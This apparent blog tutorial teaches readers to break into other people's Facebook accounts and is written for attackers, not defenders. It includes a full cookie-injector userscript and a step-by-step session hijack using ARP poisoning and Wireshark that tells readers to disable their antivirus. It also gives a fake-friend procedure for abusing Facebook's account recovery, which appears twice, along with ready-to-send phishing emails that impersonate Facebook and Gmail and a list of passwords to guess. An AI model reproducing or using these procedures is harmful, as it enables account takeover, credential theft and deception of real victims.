100% Reliable Facebook Hacking Methods

Hello friends... I am going to explain you almost all the possible methods of facebook hacking in this article. All these methods are 100% reliable and after learning all these methods, anyone can hack facebook for sure. 


But before going into the actual topic I would like to say... Facebook pays millions of dollars to security experts and penetration testers to keep the privacy of their users as safe as possible. So therefore we cannot use direct methods such as brute forcing, dictionary attacks in order to hack facebook account due to account lockout feature. However, also I would like to clear one more doubt that there is no such software which will hack a facebook password for you by just entering your email address.


I am explaining here nearly twenty ways to hack facebook. One can hack facebook using any of the following methods. And the list goes like this, starting with the noob friendly methods to professional methods.

1. Tricking victims
2. Social engineering
3. Forget password techniques
4. Friend identification
5. Phishing
6. Keylogging
7. Rats
8. Password Stealing
9. Hacking primary email address 
10. Sniffing
11. Session hijacking
12. Mobile phone hacking
13. USB hacking
14. DNS spoofing
15. Botnets
16. Sidejacking with firesheep
17. Using man in the middle attack
18. Cookie stealing

1. Tricking your victims:

In this technique, you actually trick your victim somehow to reveal his or her password to you. 
You can do it by sending your victim a fake mail pretending you are from facebook, and asking their password/ security questions etc for security purposes.


2. Social engineering:

A social engineering attack is one in which the intended victim is somehow tricked into doing the attacker's bidding. This method includes guessing and fooling the clients to give their own passwords. In this type of attack, a hacker sends a fake mail which is very convincing and appealing and asks the user for his password.

Answering the security questions also lies under this category.

And the problems with social engineering are... It is not easy to convince someone to make him give his password and Guessing generally doesn’t always work (Although if you are lucky enough it may work!). 


3. Forget passwords technique:

You can do it in the following ways:

1. Having access to his mobile
2. By answering his security questions
3. By using his friends.

The procedure goes like this.

1. First open the facebook login page in your browser and click “forget your password?” 
    Now you will be taken to a page like this 
2. Now enter your victim’s email id and click continue and you will get something like this
3. Now if you have access to his mobile, click on “Get a code from my smart phone” and click continue
4. If you don’t have access to his mobile, then click “no longer has access to these” and you will be taken to a page like this
5. Now use his friends to crack his password.


4. Phishing:

It’s the easiest and also the most popular method for hacking Facebook password. You can also search on Google the various famous Facebook hacking methods and you will find Phishing technique on the top always. And I am explaining the methods according to their popularity.

Now you want to know which my favourite method for Hacking Facebook account passwords is and I will undoubtedly tell it’s simply PHISHING


There are a variety of methods to carry out phishing attack. In a simple phishing attack, a hacker creates a fake login page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim login through the fake page, then victims "Email Address" and "Password" will be stored into a text file, and the hacker then downloads the text file and gets his hands on the victim’s credentials.

I will recommend my users to read this post for knowing how to hack Facebook using Phishing as I have explained it in detail here:




5. Keylogging:

Keylogging is the easiest way to hack a Facebook password. Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Keylogger is basically a small program which, once is installed on victim's computer, will record everything victim types on his/her computer. The logs are then sent back to the attacker by either FTP or directly to hackers email address.



6. RATS, Trojans and Backdoors:

This is an advanced level topic. It consists of a server and a client. In this type of attack the attacker sends the infected server to the victim. After execution the infected server i.e. Trojan on the victim’s PC opens a backdoor and now the hacker can do whatever he wants with the victim’s PC.

Trojans are often detected as threats by good anti viruses. Hacker must find a way like crypting to protect it from antivirus. 


7. Password stealing:


Almost 80% percent people use stored passwords in their browser to access the Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealer's are software's specially designed to capture the saved passwords stored in the victims Internet browser.


8. Hacking Primary email:

If Facebook hacker or any specific Keylogger, by some means, hacks your primary Gmail or yahoo account which you are using as primary email address, then this information account can easily hack your Facebook password using "Forgot password" trick. The Hacker will simply ask Facebook to send password to the primary email address and ask Facebook administrators to send the reset email to your primary email address- which is already hacked. Thus, your Facebook account password will be reset and it will also be hacked. 

So, always remember to protect your primary email address that you have used to create Facebook account and try to keep unknown or useless mail id as your primary email address in Facebook.

Primary Email Hacking Tools:



9. Sniffing:

It consists of stealing session in progress. In this type of attack an attacker makes connection with server and client and relays message between them, making them believe that they are talking to each other directly.
But the problems with sniffing are 

If the user is logged out then attacker will be logged out too and the session will be lost.

It is difficult to sniff on SSL protected networks.


10. Session hijacking:

Session Hijacking can be often very dangerous if you are accessing Facebook on a http (non secure) connection. In Session Hijacking attack, a hacker steals the victim’s browser cookie which is used to authenticate the user on a website, and use it to access the victims account. Session hijacking is widely used on LAN, and WiFi connections.

But the problems with session hijacking are:

1. You will be logged out when user is logged out.
2. You will not get the password of the user’s account.
3. Will not work if the user is using HTTPS connections.

11. Mobile phone hacking:
Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victim’s mobile phone then he can probably gain access to his/her Facebook account. There are many Mobile Spying softwares used to monitor a Cell phone. The most popular Mobile Phone Spying software's are: Mobile Spy, and Spy Phone Gold etc.

12. USB Hacking:

If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the Internet browser.


13. DNS Spoofing:

It’s similar to phishing, but will be done if both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original Facebook page to his own fake page and hence can get access to victims Facebook account.

14. Botnets:


Botnets are not commonly used for hacking Facebook accounts, because of its high setup costs. They are used to carry more advanced attacks. A Botnet is basically a collection of compromised computer. The infection process is same as the key logging; however a Botnet gives you additional options for carrying out attacks with the compromised computer. Some of the most popular Botnets include Spyeye and Zeus.

You can download Cythosia Bot and Adfly Bot 

15. Sidejacking with firesheep:

Sidejacking attack went common in late 2010; however it's still popular now a day. Firesheep is widely used to carry out sidejacking attacks. Firesheep only works when the attacker and victim is on the same WiFi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards WiFi users.

16. Using man in the middle attack:

If the victim and attacker are on the same LAN and on a switch based network, a hacker can place himself between the client and the server, or he could act as a default gateway and hence capturing all the traffic in between.



17. Cookie stealing:

A cookie, also known as an HTTP cookie, web cookie, or browser cookie, is a small piece of data sent from a website and stored in a user's web browser while the user is browsing that website. Every time the user loads the website, the browser sends the cookie back to the server to notify the website of the user's previous activity.

Here, we steal these cookies and use them to login to the victim’s account.


Hacking Facebook by stealing Cookies

Prerequisites:
           
5. Cookie Injector
6. A brain
7. Logic

Save the following script as "user.js"

Code:

// ==UserScript==
// @name           Cookie Injector
// @namespace      BearsWithWings
// @description    Inject Cookie String From Wireshark Dump Into Any Webpage
// @version 2.0
// @include        *
// @exclude       https?://gmail.com/*
// @exclude       https?://mail.google.com/*
// ==/UserScript==

//Anonomyous function wrapper
(function (){
    //Ensure that there is only one instance of the cookieInjector Object
    if(typeof this["cookieInjector"] == "undefined"){    
        cookieInjector = {};
    }    

    //Make a local refrence to the cookie Injector object to save on typing
    var cI = cookieInjector;
    //Make the cookieInjector object globally viewable
    unsafeWindow['cookieInjector'] = cI;
    
    /**
    * Cookie Injector createDiv function
    * Sets up the cookie injector dialogue
    */
    cI.createDiv = function(){
        //Create the DIV to contain the Dialog
        cI.dialog = document.createElement('div');
        cI.dialog.id = "cookieInjectorDiv";
        cI.dialog.innerHTML = "<div align='center'>Wireshark Cookie Dump:<br/><input type='text' id='cookieInjectorCookie'/><br/><button onclick='cookieInjector.writeCookie();'>OK</button><button onclick='cookieInjector.hide();'>Cancel</button></div>";
        cI.dialog.style.display = "none";
        cI.dialog.style.position = "fixed";
        cI.dialog.style.opacity = "0.9";
        cI.dialog.style.top = "40%";
        cI.dialog.style.background= "#DDDDDD";
        cI.dialog.style.left = "40%";
        cI.dialog.style.width = "20%";
        cI.dialog.style.zindex = "99999";
        document.body.appendChild(cI.dialog);
        cI.visible = false;
    } 

    /**
    * Show the dialog
    */
    cI.show = function(){
        if(!cI.dialog) {
            cI.createDiv();
        }
        cI.dialog.style.display = "block";
        cI.visible = true;
    }

    /**
    * Hide the dialog
    */
    cI.hide = function(){
        cI.dialog.style.display = "none";
        cI.visible = false;
    }

    /**
    * Gets the wireshark dump string and converts it into cookies
    */
    cI.writeCookie = function(){
        //Grab a handle to the text field which contains the string
        var cookieNode = document.getElementById('cookieInjectorCookie');
        var cookieText = cI.cleanCookie(cookieNode.value);
        cookieNode.value = "";
        
        //We have to add the cookies one at a time, so split around the colin
        var cookieArray = cookieText.split(";");
        for(var x=0; x<cookieArray.length; x++){
            //We want the path to be the root, the host is filled in automatically 
            //since we are on the same webpage that we captured the cookies on
            document.cookie = cookieArray[x]+"; path=/";
        }        

        alert("All Cookies Have Been Written");
        cI.hide();
    }

    /**
    * Do a little big of cleanup on the cookie string, Mostly we are looking
    * To get rid of the "Cookie: " string that Wireshark prepends to the cookie string
    */
    cI.cleanCookie = function(cookieText){
        var cookie = cookieText.replace("Cookie: ","");
        return cookie;
    }    
    
    /**
    * Handle all keypresses, we are looking for an ALT-C key-combo. Since we can't detect
    * Two keys being pressed at the same time, we first make sure the ALT key was pressed
    * then we wait to see if the C key is pressed next
    */
    cI.keyPress = function (e){    
        //Check to see if "C" is pressed after ALT    
        if(e.keyCode == 67 && cI.ctrlFire){
            if(!cI.visible){        
                cI.show();
            }else{
                cI.hide();
            }
        }

        //Make sure the Alt key was previously depressed
        if(e.keyCode == 18){
            cI.ctrlFire = true;
        }else{
            cI.ctrlFire = false;
        }
    }

    //Capture all onkeydown events, so we can filter for our key-combo
    cI.visible = false;
    window.addEventListener('keydown', cI.keyPress,'false');
})();

Procedure:

1. Download and install Firefox.


2. Download and install Grease monkey as an Ad-On to your Browser (Firefox).
            a. Go to link and download 
            b. Click on Add to "Firefox" As shown in the below figure.


            c. Wait for the Pop up and wait 5 second then press "Install".


           d. Once installed correctly you should see a monkey face on top right of your firefox browser.
           e.  Make sure that the Grease monkey is enabled.

3. Download and install Cookie Injector 2.0 with Grease monkey.
           a. Find it on google (Cookie Injector 2.0)
           b. Download and Install Cookie Injector 2.0 with Grease monkey.


           c. Make sure that Cookie Injector 2.0 is enabled.

4. Download and Install Cain and Abel.

5. Download and Install Wireshark.

After these steps you should have the icons for Cookie injector, Cain and Wireshark installed on your desktop.


6. Now Open Firefox and open a Facebook page.

While on the page press on "Alt + C", you will see Wireshark cookie dump that will appear on your Facebook page like the following image.


7. Now you will open Cain and Abel.
            a. Make sure you disable any AV or Firewall.
            b. Configure your Cain and Abel correctly.
            c. Go to Sniffer and at the bottom you can see "Host", click it.

       It should look like this:


            d. 4. At the bottom click on "APR"
            e. Click on "Add to list" the blue (+)


            f. Choose your PC IP and Modem/Rooter IP.
            g. Click on Start/Stop APR and let it run.

8. Now Open Wireshark.

            a. Click on Capture Options.
            b. Choose your Network Internet.
            c. Click on Start.


9. Now you should see a bunch of IPs coming with info.


Search for http.cookie/cookie/http

Right click on it, copy>Bytes>Printable text only.

Then go back to your Facebook page, Copy and paste it to the Wireshark Cookie Dump and press "Ok".

Now when you reload the page you should have logged in.


Hacking facebook, password recovery loophole using friends

Facebook is adding more and more features to attract users but when you develop something that's for sure you will introduce new loopholes. Today i will explain you how to hack a Facebook account password just by utilizing recovery password loophole. These novice coders think that they have made secured features but they really doesn't their daddy is sitting outside. By today's hacking method i can give guarantee to you that you can hack anyone's Facebook account in less than 5 minutes and its 100% working hack and i have used it more than 100 times. I always tell things little bit late as i always love to enjoy the fancy of new loopholes... 


Prerequisites:

1. Victim (whose Facebook account password you wanna hack) should be on Facebook.

2. Create four to five fake Facebook accounts (three are sufficient but one more for bonus). I will advice you that create accounts with girl names and put an awesome girl’s photographs. Fill the basic profile... I am telling you to create accounts with Girl names, just because hungry boys accept girl’s friend requests without any delay. And if you know the person personally then create account with names of his near ones and say that you have created new profile so add you as a friend. Note all the three to four fake accounts should not be friends or any relationship with each other.

3. Most important requirement is that you need to add all the above three accounts to the friends list of your victim whose Facebook account you are going to hack. 

4. At least two web browsers. One can be used for the recovery purpose and one for viewing codes.

Procedure:

1. Open the Facebook in your web browser. 


2. Now Click on Forgot your password? A new tab will open something like this. 


3. In the email box give the email ID of your victim and press enter.

4. Now you have reached to the Facebook password recovery screen as show below:


        Now click on "No Longer have access to these?" hyperlink to go to next step.

5. Hmm... It sounds great everything going smoothly... So friends after following step 4 you will reach to a page similar to the one as shown below. There you will be asked to enter your new email ID for contact. Its most important as password reset request after submitting codes will be received on this... 


6. After submitting you will have either of two situations:

        First one will be recover your account with friends.
        Answer the security question.

(Sometimes you will be directly asked to recover your account with your friends)

7. Choose the first option. Now you are at screen saying “Recover your password using your friends" as shown below in snapshot.


8. Just click on continue and select the three trusted friends. The three fake accounts that we have created for him to hack his account...

9. You can also perform this hack by making your friends participate to hack someone’s account... Now select three accounts one by one. You will be asked to review your friends as shown below. Click send codes to your friends.


10.  You will get all the three codes... 

So guys we are done.... Fill the codes into boxes as in the below image, that you have received into you messages in Facebook and on email if feed is subscribed.


Click on submit now it will ask you to validate your email account that you have filled in Step number 5. That email should be genuine as you will receive recovery email on that email account only...

That’s it. You just hacked a facebook account... Enjoy.



Hack facebook with forget password technique

Forget passwords technique:

You can do it in the following ways:

1. Having access to his mobile
2. By answering his security questions
3. By using his friends.

The procedure goes like this.

1. First open the facebook login page in your browser and click “forget your password?” 

2. Now enter your victim’s email id and click continue

3. Now if you have access to his mobile, click on “Get a code from my smart phone” and click continue

4. If you don’t have access to his mobile, then click “no longer have access to these” and you will be taken to a page like this

5. Now use his friends to crack his password.

Detailed procedure to hack facebook with this vulnerability:

Prerequisites:

1. Victim (whose Facebook account password you wanna hack) should be on Facebook.

2. Create four to five fake Facebook accounts (three are sufficient but one more for bonus). I will advice you that create accounts with girl names and put an awesome girl’s photographs. Fill the basic profile... I am telling you to create accounts with Girl names, just because hungry boys accept girl’s friend requests without any delay. And if you know the person personally then create account with names of his near ones and say that you have created new profile so add you as a friend. Note all the three to four fake accounts should not be friends or any relationship with each other.

3. Most important requirement is that you need to add all the above three accounts to the friends list of your victim whose Facebook account you are going to hack. 

4. At least two web browsers. One can be used for the recovery purpose and one for viewing codes.

Procedure:

1. Open the Facebook in your web browser. 


2. Now Click on Forgot your password? A new tab will open something like this. 


3. In the email box give the email ID of your victim and press enter.

4. Now you have reached to the Facebook password recovery screen as show below:


        Now click on "No Longer have access to these?" hyperlink to go to next step.

5. Hmm... It sounds great everything going smoothly... So friends after following step 4 you will reach to a page similar to the one as shown below. There you will be asked to enter your new email ID for contact. Its most important as password reset request after submitting codes will be received on this... 


6. After submitting you will have either of two situations:

        First one will be recover your account with friends.
        Answer the security question.

(Sometimes you will be directly asked to recover your account with your friends)

7. Choose the first option. Now you are at screen saying “Recover your password using your friends" as shown below in snapshot.


8. Just click on continue and select the three trusted friends. The three fake accounts that we have created for him to hack his account...

9. You can also perform this hack by making your friends participate to hack someone’s account... Now select three accounts one by one. You will be asked to review your friends as shown below. Click send codes to your friends.


10. You will get all the three codes... 

So guys we are done.... Fill the codes into boxes as in the below image, that you have received into you messages in Facebook and on email if feed is subscribed.


Click on submit now it will ask you to validate your email account that you have filled in Step number 5. That email should be genuine as you will receive recovery email on that email account only...

That’s it. You just hacked a facebook account... Enjoy.


Social engineering in Facebook hacking

Social engineering to hack facebook:


A social engineering attack is one in which the intended victim is somehow tricked into doing the attacker's bidding. An example would be responding to a phishing email, following the link and entering your banking credentials on a fraudulent website. The stolen credentials are then used for everything from finance fraud to outright identity theft. An old adage comes to mind here, "it pays to be suspicious". With socially engineered attacks, the opposite is also true - if you aren't suspicious, you likely will end up paying. In addition to phishing, social engineering attacks can come in many forms - email that masquerades as breaking news alerts, or greeting cards, or announcements of bogus lottery winnings. Pump and dump stock scams are also a form of social engineering, playing on the recipients' natural desire to take advantage of a good deal. It's important to remember that if something sounds too good to be true, it's probably a scam. Social engineering attacks are also often used to trick users into infecting their own systems - for example, by disguising the malware as a video codec or Flash update. An email is sent enticing the recipient to view a bogus video clip, the victim visits the link contained in the email and installs the "codec/update" which turns out to be a backdoor Trojan or keystroke logger.

Remember: with social engineering scams, the attacker is relying on you to make the wrong choice. Choose not to be a victim.

Some Common passwords that you can try on your friends are: 

1. Their mobile number or their girlfriend or boyfriend mobile number. 
 (Always try his previous or old mobile number as they are not as much as fool that they appears)
2. Their Girlfriend or boyfriend names or their own names concatenating with their Girlfriend or boyfriend names.
3. Date of births
4. Their favourite movie names , cartoon character names or favourite music band names or simply the hero names like batman, dark knight, Superman, Godzilla, Spartacus and much more..
5. Most important now most website ask that password should be alphanumeric now what users do they just adds 1, 2, 3 in their normal passwords and some more smart guys add !, @, # in their passwords and amazingly all in Sequence.

And the problems with social engineering are... It is not easy to convince someone to make him give his password and Guessing generally doesn’t always work (Although if you are lucky enough it may work!). 

How to hack facebook by tricking your victim

Tricking your victims:

In this technique, you actually trick your victim to somehow reveal his or her password to you.
You can do it by sending your victim a fake mail pretending you are from facebook, and asking their password/ security questions etc for security purposes.


The trick goes like this

Hi (Victims name),

This is to inform you that we are going to deactivate your account in 15 days because you have not followed our terms and rules while using your Facebook account. We found that your Facebook account is not following our rule 5.A.1 which is listed in our Content Guidelines.

To reactivate your account, please change your password to 3d8Aj4Fn. Please keep up your password as 3d8Aj4Fn for at least a week so that we can verify your ownership.

Thank you.

Or

You can do it more professionally like this. Everyone creates a facebook account using an email. Lets say Gmail for example. So you create a new Gmail like newsletter.xxxx@gmail.com

Now send your victim an email like this.

Hi (Victims name),

Your Gmail account was recently logged in from a computer, mobile device or other from a location you've never used before. For your protection, we will deactivate your account temporarily if you don’t respond to this email within 7 days.

To prevent your account deactivation, please reply with your account details as follows at the earliest.

Your name:
Your username:
Your password:
Your last login details:
                                    Date       :
                                    Time       :
                                    Location:
Year of joining:

Thank you.

Or

You can send your victim a fake SMS asking the same.
Once you have his primary login details, you can crack his facebook as well.
These tricks are endless and require brain to do it.


But the only problem with this trick is... Now a day everyone is having some basic knowledge about computers, networking and internet. So it’s difficult to trick your victim. But have a good luck.

Related Posts Plugin for WordPress, Blogger...